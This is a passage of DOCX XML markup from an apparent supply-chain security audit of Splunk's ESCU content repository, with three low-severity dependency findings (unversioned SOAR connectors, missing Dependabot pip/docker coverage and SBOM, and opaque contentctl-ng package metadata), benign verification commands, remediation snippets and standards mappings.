      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SOAR playbooks declare no app versions, depend on unversioned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> custom functions/sub-playbooks and on platform-bundled Python libraries (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dateutil</w:t>
      </w:r>
      <w:r>
        <w:t>)</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405</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    from dateutil.parser import parse</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406</w:t>
        <w:tab/>
        <w:t xml:space="preserve">    from django.utils.dateparse import parse_datetime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: SOAR exports can carry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> so the importing instance can warn when the installed connector differs; here every block is blank, so the 21 connectors (CrowdStrike OAuth API in 42 blocks, SSH 14, WinRM 12, ...) are matched by name only and any breaking change in a connector's action schema will surface only at runtime. Nine input playbooks hinge on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>community/dispatch_input_playbooks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and 27 blocks on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>community/workbook_task_update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the community repo is a moving target with no version pin recorded in the export. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>risk_notable_import_data.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> imports Django (part of the SOAR platform, not a declared dependency) for date parsing - this couples the playbook to SOAR's internal web framework version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[TK: SOAR 6.x bundles Django 4.x; older 5.x bundled 2.x/3.x]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. None of this is exploitable by itself; it is a maintainability/compatibility finding for shipped automation content. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A for SCA (SOAR-input handling is covered by the playbook reviewer). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aggregation (Section (i)-e): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values per connector all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{'': n}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -c '"repoName": "community"' playbooks/*.json | awk -F: '{s+=$2} END{print s}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; 98 occurrences. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: re-export from a current SOAR (6.4.x) with apps installed so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>app_version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is populated, and replace the Django import with stdlib:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># playbooks/risk_notable_import_data.py (lines 405-406 replacement)</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from datetime import datetime</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def parse_datetime(value: str) -&gt; datetime:</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 ISO-8601 with optional 'Z'; raises ValueError on garbage (same contract as django.utils.dateparse but strict)</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return datetime.fromisoformat(value.replace("Z", "+00:00"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Add a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/REQUIREMENTS.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (or a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dependencies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> block in each </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>playbooks/*.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) listing connector minimum versions and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> repo commit the custom functions were vendored from; vendor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dispatch_input_playbooks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into this repo (it is Splunk-owned) so the dependency is versioned with ESCU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1357 Reliance on Insufficiently Trustworthy Component. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-8 System Component Inventory, SA-22 Unsupported System Components, SR-3 Supply Chain Controls and Processes. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.AM Identify - Asset Management, GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.8 Management of technical vulnerabilities, A.5.21 Managing information security in the ICT supply chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-12 — Dependency-update automation does not cover pip or docker ecosystems; no SBOM produced with releases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 3.1). Exploitability: Process gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/dependabot.yml:1-10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t>: Dependency-update automation does not cover the Python or container ecosystems; no SBOM is produced with releases</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3</w:t>
        <w:tab/>
        <w:t>- package-ecosystem: "github-actions"</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7</w:t>
        <w:tab/>
        <w:t>- package-ecosystem: "pre-commit"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Dependabot watches GitHub Actions and pre-commit (good), but not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) nor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunk/splunk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> image). The custom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datasource-dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> job covers Splunkbase TAs. Consequently the component class with the largest attack surface (65 Python packages run in the build) has no automated advisory or version tracking, and consumers of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DA-ESS-ContentUpdate.tar.gz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> receive no SBOM describing its embedded third-party data (DEP-06) or build toolchain (SSDF PS.3.2). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (process gap). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cat -n .github/dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (10 lines, two ecosystems); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>grep -rniE 'sbom|cyclonedx|syft|spdx' .github/workflows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; no matches. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: extend </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dependabot.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as shown in DEP-01 and add an SBOM + audit step to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>build.yml</w:t>
      </w:r>
      <w:r>
        <w:t>:</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 name: Generate SBOM and audit</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run: |</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python -m pip install --require-hashes -r .github/workflows/requirements-tools.txt   # pip-audit, cyclonedx-bom pinned</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pip-audit --strict --require-hashes -r requirements.txt</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cyclonedx-py requirements requirements.txt --of JSON -o dist/sbom-build-toolchain.cdx.json</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 uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a   # v7.0.1</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with:</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name: content-latest</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path: |</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dist/*.tar.gz</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dist/sbom-*.cdx.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-1104 Use of Unmaintained Third Party Components; CWE-1395 Dependency on Vulnerable Third-Party Component. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CM-8 System Component Inventory, RA-5 Vulnerability Monitoring and Scanning, SR-4 Provenance, SI-2 Flaw Remediation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID.AM Identify - Asset Management, GV.SC Govern - Cybersecurity Supply Chain Risk Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.8 Management of technical vulnerabilities, A.5.21 Managing information security in the ICT supply chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Dependencies / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DEP-07 — contentctl-ng has no licence metadata, placeholder description and a non-public source repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (no CVSS score (informational)). Exploitability: Provenance gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requirements.txt:1 (contentctl-ng 1.1.1 METADATA)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Title</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Core build dependency </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has incomplete, unverifiable package metadata (no license, placeholder description, non-public source repository, pre-release cadence)</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1</w:t>
        <w:tab/>
        <w:t>Metadata-Version: 2.3</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2</w:t>
        <w:tab/>
        <w:t>Name: contentctl-ng</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3</w:t>
        <w:tab/>
        <w:t>Version: 1.1.1</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4</w:t>
        <w:tab/>
        <w:t>Summary: Add your description here</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23</w:t>
        <w:tab/>
        <w:t>Requires-Python: &gt;=3.14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The package was first published 2026-05-07 and has had 13 releases in four months (0.1.0 -&gt; 1.1.1, 2026-08-18). The README points to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>github.com/splunk/contentctl-ng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which returns 404 / requires authentication, so no one outside Splunk can audit the code, confirm the license, or match the wheel to a tagged commit (no PEP 740 attestations / Trusted Publishing provenance were visible in the PyPI JSON). The previous tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunk/contentctl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is public and Apache-2.0 (verified). For an open-source repository that invites community PRs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CONTRIBUTING.md</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), this means contributors run an opaque binary dependency with network access (Splunkbase auth, S3, Docker socket via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python-on-whales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) on their workstations. Also notable: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Requires-Python &gt;=3.14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> forces the newest CPython (3.14.0 released 2025-10-07), which excludes the system Pythons of all current Debian/Ubuntu/RHEL LTS releases and pushes developers toward ad-hoc interpreter installs (I had to use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>uv python install 3.14</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (provenance/transparency gap). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -s https://pypi.org/pypi/contentctl-ng/1.1.1/json | jq '.info.license, .info.license_expression, .info.classifiers'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>null, null, []</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>curl -o /dev/null -w '%{http_code}' https://raw.githubusercontent.com/splunk/contentctl-ng/main/pyproject.toml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git ls-remote https://github.com/splunk/contentctl-ng.git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -&gt; "could not read Username". </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: in contentctl-ng's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>pyproject.toml</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>[project]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name = "contentctl-ng"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>version = "1.1.2"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>description = "Splunk Threat Research Team content build, validation and test tool for ESCU"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>readme = "README.md"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
